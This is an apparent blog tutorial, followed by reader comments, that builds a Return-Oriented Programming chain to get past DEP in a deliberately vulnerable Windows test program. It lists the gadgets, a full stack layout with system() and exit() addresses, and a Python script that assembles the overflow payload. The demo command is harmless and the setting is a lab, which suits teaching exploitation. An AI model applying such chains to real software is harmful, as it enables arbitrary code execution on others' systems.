Motivation
You have found a stack buffer overflow vulnerability in a program, but the target environment is protected by the hardware-enforced Data Execution Prevention (DEP) mechanism. Briefly, this security feature allows certain parts of memory, e.g. stack or heap memory pages, to be marked as non-executable.
Therefore you can't just overwrite the saved eip with the address of a jmp esp instruction and execute the shellcode from the stack (attempting to run code from the stack will cause a STATUS_ACCESS_VIOLATION exception).
Return-Oriented Programming (ROP) technique
This technique uses existing instruction sequences from loaded modules. No function calls, and no attacker-placed instructions are executed! Because all the executed instructions are located in executable memory pages, this allows us to bypass hardware-enforced DEP.
Shacham et al. state that ROP, given any sufficiently large codebase to draw on, is a Turing-complete exploit language, which means it can express any computation.
More information, including historical facts and detailed explanation, can be found in these slides.
The Goal
For the sake of simplicity, I will assume that there's a vulnerability which allows us to overwrite the saved eip using a regular stack buffer overflow (read: no stack canary protection applied). I will take control of the program flow, echo the "You have been hacked" string using the system function, and exit the program. Note that ROP is not limited to the system function for executing attacker code - I just use it to simplify the example.
The Preparations
I will use the Wikipedia stack buffer overflow example program as the vulnerable target, with one slight difference: instead of the strcpy function I use fread, just to make testing more convenient:
Note: I'm using Windows 7 64-bit with Visual Studio 2010.
Before compiling the project, I've set the following options:
- The /GS flag should be set to No [Project Properties > C/C++ > Code Generation > Buffer Security Check > set to No (/GS-)]. This disables the stack canary protection.
- /NXCOMPAT should be set to Yes [Project Properties > Linker > Advanced > Data Execution Prevention > set to Yes (/NXCOMPAT)]. This setting enables DEP protection.
- Optimization should be disabled [Project Properties > C/C++ > set both Optimization and Inline Function Expansion to Disabled], so that the compiler generates the exact instructions for our program.
A few notes on the C run-time library:
- I'm using Visual Studio 2010, so the library version is 10.0, but it can vary depending on Visual C++ compiler version.
- If you compiled with Debug configuration, the referenced library will be MSVCR100D.dll (D stands for debug).
Gadgets Strategy
Shacham et al. coined the term gadget for a sequence of existing instructions, ending with a ret instruction, that forms one logical unit. ROP is about chaining gadgets (logical units) to accomplish the exploitation goal. For example, if I need to copy the value of eax to ecx, I will search for a mov ecx, eax + ret sequence within the existing modules, and the address of the mov ecx, eax instruction will be the gadget's address.
Read through the example below and the principle will become clear.
This example's gadgets strategy will be as follows:
- Save the esp's value into another register.
- Prepare the parameters for the system function.
- Call the system function.
- Call the exit function to exit the program.
Searching for ROP gadgets
I will use the simplest way to find gadgets. See the Mona project (ex pvefindaddr) for a more sophisticated technique.
In OllyDbg, select the module you want to browse, right click within the module code view and select Search for > All sequences. The following dialog will show up:
The following commands are available (found here):
- R8, R16, R32 for any 8, 16, 32 bit register respectively
- CONST for any constant
- JCC for any conditional jump
- ANY N for any 0..N commands
- ... and of course any assembly command
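To make the idea of a gadget search concrete outside the debugger, here is a minimal sketch. It is not how OllyDbg or Mona work internally; it only scans a raw byte buffer for the x86 encoding of pop eax followed by ret (58 C3). The sample bytes, the base address, and the find_gadgets helper are all made up for illustration; a real search would read the executable sections of a loaded module.

```python
# Minimal sketch: find byte-level occurrences of a gadget in a code buffer.
# The buffer contents and the base address are invented for illustration.

POP_EAX_RET = bytes([0x58, 0xC3])  # x86 encoding of: pop eax ; ret


def find_gadgets(code, pattern, base=0):
    """Return the address of every occurrence of `pattern` in `code`."""
    hits = []
    pos = code.find(pattern)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(pattern, pos + 1)
    return hits


# Hypothetical code bytes: nop, pop eax, ret, nop, nop, pop eax, ret
sample = bytes([0x90, 0x58, 0xC3, 0x90, 0x90, 0x58, 0xC3])
hits = find_gadgets(sample, POP_EAX_RET, base=0x10000000)
print([hex(h) for h in hits])
```

Each hit is a candidate gadget address; a byte-level match like this can also start in the middle of a longer instruction, which is one reason the debugger's instruction-aware search is more convenient.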
The Exploit
1. Saving the ESP value
The best gadget for this task would be mov r32, esp + ret, but unfortunately none of the referenced modules includes this sequence. I then searched for push esp + pop r32 + ret, but this pattern returned no results either. I believe you are already convinced that searching for gadgets and building chains requires patience and erudition. Corelan even compares it to solving a Rubik's Cube.
In the end I used the following search pattern:
and found this sequence in msvcr100.dll (let's call it LEA EBP,[ESP+0Ch] gadget):
lea ebp, dword ptr ss:[esp+0Ch]
push eax
retn
Great! It's a bit inconvenient, but better than nothing. I will have to add extra instructions to accommodate the push eax instruction in the middle, right? Well, let's think about this a bit.
The stack will look like this before the jump to the lea instruction's address (assuming 0x1000 is the stack address of the saved eip value):
0x1000 LEA EBP,[ESP+0Ch] gadget address
0x1004 junk
0x1008 junk
Let's follow the flow: we reach the ret instruction, which pops the LEA EBP,[ESP+0Ch] gadget's address from the stack and jumps to that location (esp increases to 0x1004 because of the pop); then esp+0Ch is computed and stored in ebp; then push eax decreases esp to 0x1000 and writes the value of eax (some unknown garbage) to 0x1000. But note what happens next: the retn instruction pops that value from the stack (eax's unknown garbage) and jumps to it. Not good!
We have to initialize eax with a valid address first - the search pattern pop eax + ret returned many matches (I chose one from msvcr100.dll).
Let's summarize the desired stack view at this point:
0x1000 POP EAX gadget address (saved EIP value)
0x1004 RET address (any RET instruction address - will be popped to EAX and used to increment the ESP)
0x1008 LEA EBP,[ESP+0Ch] gadget address
When ebp's value is calculated, esp points to 0x100c (verify that you understand why), so the value stored in ebp is 0x1018. At the end of this sequence, esp again points to 0x100c.
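If you want to check the esp bookkeeping, the three stack slots can be replayed by hand. The following is only a sketch under the example's assumptions (the saved eip sits at 0x1000); the gadget addresses are replaced by symbolic strings, and only esp, eax and ebp are modelled.

```python
# Minimal sketch: replay the first three stack slots by hand.
# Gadget "addresses" are symbolic strings; 0x1000 is the example's saved EIP slot.

stack = {
    0x1000: "POP_EAX",  # overwritten saved EIP
    0x1004: "RET",      # popped into eax by the POP EAX gadget
    0x1008: "LEA_EBP",  # LEA EBP,[ESP+0Ch] gadget
}
regs = {"esp": 0x1000, "eax": None, "ebp": None}


def pop():
    """Read the dword at esp, then move esp up by 4."""
    value = stack[regs["esp"]]
    regs["esp"] += 4
    return value


def push(value):
    """Move esp down by 4, then write the dword there."""
    regs["esp"] -= 4
    stack[regs["esp"]] = value


target = pop()                    # vulnerable function's ret -> POP EAX gadget
regs["eax"] = pop()               # pop eax (eax now holds the RET address)
target = pop()                    # ret -> LEA EBP,[ESP+0Ch] gadget
esp_at_lea = regs["esp"]
regs["ebp"] = regs["esp"] + 0x0C  # lea ebp, [esp+0Ch]
push(regs["eax"])                 # push eax
target = pop()                    # retn -> jumps to the plain RET instruction

print(hex(esp_at_lea), hex(regs["ebp"]), hex(regs["esp"]), target)
```

The plain RET that eax pointed to then pops the slot at 0x100c, which is where the next gadget address goes.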
2. Prepare the parameters for the system() function call
The system() function expects a single parameter: the address of a string containing the command to execute. In the __cdecl calling convention this address is passed on the stack, so in total I need to calculate two addresses:
- The address of command string.
- The address on the stack where system expects to find the parameter.
In the previous step, I stored the esp+0Ch address in the ebp register. ebp rarely takes part in arithmetic operations, so I will copy its value to the eax register. The mov eax,ebp + ret search pattern didn't return any results, so I searched for a lea instruction again: lea eax,[ebp+CONST] + ANY 1 + ret returned the following sequence (from ntdll.dll, let's call it the LEA EAX,[EBP-10h] gadget):
lea eax, [ebp-10h]
mov dword ptr fs:[0], eax
retn
Note that the second instruction in this sequence overwrites the FS:[0] pointer, which points to the head of the SEH (Structured Exception Handling) chain. I don't care about that at this point.
Recall that ebp's value was 0x1018, so eax will get 0x1008. Let's now calculate the address of the system function's parameter (which will eventually store the address of our command string).
The add eax, CONST + ret search pattern retrieved many results. I will choose the following from ntdll.dll (ADD EAX,20h gadget):
add eax, 20h
retn
Executing this gadget once increases eax to 0x1028, but that is not sufficient, because writing there would overwrite the shellcode (see below). So let's make more room and execute the gadget again: eax will then point to 0x1048, which is high enough.
Now I'll save it in another register (because we have to continue calculating with eax). The search pattern mov R32,eax + ANY 2 + ret returned the following sequence (MOV ECX,EAX gadget) from ntdll.dll:
mov ecx, eax
mov eax, edx
mov edx, ecx
retn
The value of eax is copied to ecx and edx, but eax itself is overwritten with edx's previous value. So we have to restore eax (MOV EAX,EDX gadget from msvcr100.dll):
mov eax, edx
retn
The last thing to do here is to calculate the address of our command string and store it at the address ecx points to. The ADD EAX,20h gadget brings eax to 0x1068 (this will be the address of our command string), and then we store it with the MOV [ECX],EAX gadget (from msvcr100.dll):
mov [ecx], eax
retn
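The register arithmetic of this step is easy to lose track of, so here it is replayed as plain assignments. This is a sketch using the example's addresses only; the initial edx value is a placeholder (its real content is unknown at this point), and the memory dict stands in for the stack.

```python
# Minimal sketch: the register arithmetic of step 2, with the example addresses.
ebp = 0x1018       # left by the LEA EBP,[ESP+0Ch] gadget
edx = 0xDEADBEEF   # unknown at this point; placeholder value
memory = {}        # stands in for the stack slots being written

eax = ebp - 0x10   # LEA EAX,[EBP-10h] gadget  -> 0x1008
eax += 0x20        # ADD EAX,20h gadget        -> 0x1028
eax += 0x20        # ADD EAX,20h gadget        -> 0x1048 (parameter slot)

# MOV ECX,EAX gadget: three instructions, executed in order
ecx = eax          # mov ecx, eax
eax = edx          # mov eax, edx  (eax is clobbered here)
edx = ecx          # mov edx, ecx

eax = edx          # MOV EAX,EDX gadget restores eax
eax += 0x20        # ADD EAX,20h gadget        -> 0x1068 (command string)
memory[ecx] = eax  # MOV [ECX],EAX gadget

print(hex(ecx), hex(eax), {hex(k): hex(v) for k, v in memory.items()})
```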
The command passed to the system function will be echo, with "You have been hacked" as its parameter.
The stack view at this point will be as follows:
0x100c LEA EAX,[EBP-10h] gadget address
0x1010 ADD EAX,20h gadget address
0x1014 ADD EAX,20h gadget address
0x1018 MOV ECX,EAX gadget address
0x101c MOV EAX,EDX gadget address
0x1020 ADD EAX,20h gadget address
0x1024 MOV [ECX],EAX gadget address
...
0x1048 0x1068 (system() parameter)
...
0x1068 6F686365h ; echo
0x106c 756F5920h ; You
0x1070 76616820h ; hav
0x1074 65622065h ; e be
0x1078 68206E65h ; en h
0x107c 656B6361h ; acke
0x1080 00000064h ; d
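The dword values for the command string do not have to be worked out by hand. As a small sketch (the variable names are mine, and 0x1068 is just the example's address), Python's struct module can split the NUL-terminated string into little-endian dwords:

```python
import struct

# Minimal sketch: split the command string into little-endian dwords.
command = b"echo You have been hacked\x00"

# Pad with NUL bytes up to a multiple of 4 so it splits into whole dwords.
padded = command + b"\x00" * (-len(command) % 4)
dwords = struct.unpack("<%dI" % (len(padded) // 4), padded)

for index, value in enumerate(dwords):
    # 0x1068 is the example's address for the start of the string.
    print("0x%04x %08Xh" % (0x1068 + 4 * index, value))
```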
3. Calling the system() and exit() functions
Download and compile the arwin program, a tiny win32 address resolution tool. It takes a module name and a function name as parameters and outputs the function's address within the module. Both the system and exit functions are located in msvcr100.dll, so I ran it like this:
D:\>arwin msvcr100.dll system
arwin - win32 address resolution program - by steve hanna - v.01
system is located at 0x78b02632 in msvcr100.dll
D:\>arwin msvcr100.dll exit
arwin - win32 address resolution program - by steve hanna - v.01
exit is located at 0x78ac7b0c in msvcr100.dll
Now we need to decide where to place those two addresses.
Recall that in __cdecl calling convention, in order to call a function with a parameter you have to push the parameter on the stack and use the call instruction. This instruction pushes the content of eip onto the stack, which in turn points to the next instruction after the call. When the function finishes, ret instruction will pop the saved eip from the stack and jump to that location. Let's mimic this behavior:
We've already stored the system parameter (the address of our echo command) at 0x1048. Just below it (at 0x1044) should be the saved eip, which is the address of the next instruction after the call to the system function - in this case it's the address of the exit function.
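To see why this layout mimics a call, consider what system() finds on entry when it is reached through a ret rather than a call. The sketch below assumes the system() address itself is placed one slot lower, at 0x1040, and models only esp and three stack slots.

```python
# Minimal sketch: what system() sees on entry when reached through ret.
stack = {
    0x1040: 0x78B02632,  # system() address, consumed by the preceding ret
    0x1044: 0x78AC7B0C,  # exit() address, sitting in the return-address slot
    0x1048: 0x1068,      # pointer to the command string (written at run time)
}
esp = 0x1040

eip = stack[esp]         # ret: pop the jump target into eip
esp += 4

# On entry to a __cdecl function, [esp] is the return address
# and [esp+4] is the first argument.
return_address = stack[esp]
first_argument = stack[esp + 4]

print(hex(eip), hex(return_address), hex(first_argument))
```

So when system() returns, its own ret pops the exit() address, exactly as if a call instruction had pushed it.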
Let's summarize it all together:
0x1000 POP EAX gadget address (saved EIP value)
0x1004 RET address (any RET instruction address - will be popped to EAX and used to increment the ESP)
0x1008 LEA EBP,[ESP+0Ch] gadget address
0x100c LEA EAX,[EBP-10h] gadget address
0x1010 ADD EAX,20h gadget address
0x1014 ADD EAX,20h gadget address
0x1018 MOV ECX,EAX gadget address
0x101c MOV EAX,EDX gadget address
0x1020 ADD EAX,20h gadget address
0x1024 MOV [ECX],EAX gadget address
0x1028 RET address
0x102c RET address
0x1030 RET address
0x1034 RET address
0x1038 RET address
0x103c RET address
0x1040 78b02632 (system() function address)
0x1044 78ac7b0c (exit() function address)
0x1048 0x1068 (system() parameter)
...
0x1068 6F686365h ; echo
0x106c 756F5920h ; You
0x1070 76616820h ; hav
0x1074 65622065h ; e be
0x1078 68206E65h ; en h
0x107c 656B6361h ; acke
0x1080 00000064h ; d
Note that I filled addresses 0x1028 to 0x103c with ret instruction addresses just to increment the esp register by 4 bytes each time.
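As an alternative to typing the bytes by hand, the layout above can be assembled with a short script. This is only a sketch: every gadget address below is a hypothetical placeholder (the real values depend on the modules loaded in your target), the filler dword is arbitrary, and the 20 bytes of padding before the saved eip are specific to this example program. Only the system and exit addresses come from the arwin output.

```python
import struct

# Hypothetical gadget addresses: placeholders only, NOT real module addresses.
POP_EAX = 0x11111111       # pop eax ; ret
RET = 0x22222222           # any ret instruction
LEA_EBP = 0x33333333       # LEA EBP,[ESP+0Ch] gadget
LEA_EAX = 0x44444444       # LEA EAX,[EBP-10h] gadget
ADD_EAX_20 = 0x55555555    # ADD EAX,20h gadget
MOV_ECX_EAX = 0x66666666   # MOV ECX,EAX gadget
MOV_EAX_EDX = 0x77777777   # MOV EAX,EDX gadget
MOV_PECX_EAX = 0x88888888  # MOV [ECX],EAX gadget

SYSTEM = 0x78B02632        # from the arwin output
EXIT = 0x78AC7B0C          # from the arwin output
FILLER = 0x41414141        # arbitrary junk dword

chain = [POP_EAX, RET, LEA_EBP,                      # 0x1000..0x1008
         LEA_EAX, ADD_EAX_20, ADD_EAX_20,            # 0x100c..0x1014
         MOV_ECX_EAX, MOV_EAX_EDX, ADD_EAX_20,       # 0x1018..0x1020
         MOV_PECX_EAX]                               # 0x1024
chain += [RET] * 6                                   # 0x1028..0x103c
chain += [SYSTEM, EXIT]                              # 0x1040, 0x1044
chain += [FILLER]                                    # 0x1048: set at run time
chain += [FILLER] * 7                                # 0x104c..0x1064

payload = b"A" * 20                                  # padding up to saved EIP
payload += struct.pack("<%dI" % len(chain), *chain)  # little-endian dwords
payload += b"echo You have been hacked\x00"          # lands at 0x1068

print(len(payload))
```

Writing payload to a file opened in binary mode gives the input for the vulnerable program; the slot at 0x1048 can hold anything, since the MOV [ECX],EAX gadget fills it in at run time.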
Final Note
That's it. Now I'll use a hex editor to craft a binary file with the shellcode content (including 20 padding bytes at the beginning). If everything goes well, the expected result will be displayed:
For additional reading:
ROP exploit writing tutorial by Corelan
Great article...
I was reading about ROP based PDF exploits, failed to understand how it worked. So I start reading whatever I am finding. Please send me an email if possible at rzvzrz-at-gmail-dot-com.
did it work well? i've just follow what you've done and i can't find MOV [ECX],EAX gadget;
only i can got best is :
MOV [ECX],EAX
LEAVE
RETN
and LEAVE instr. is ruining me...
Try to save the argument pointer address (0x1048 in my example) in another register.
I'm using MOV ECX,EAX (at 0x1018), but instead of ECX, if you'll find a gadget with another register; and then will find a gadget with same register to replace ECX in MOV [ECX],EAX (0x1024) - you will be ready to proceed.
and what should i write in hex for 0x1048 0x1068 (system() parameter) ??
and i very appreciate you for the great post
The value at 0x1048 is calculated at runtime. You should populate it with the starting address of your system command (the one that used as an argument to system function).
ok i think i got it. thank you very much again. and i found MOV [ECX],EAX gadget on msvcr100d.dll
(i'm using VS2012)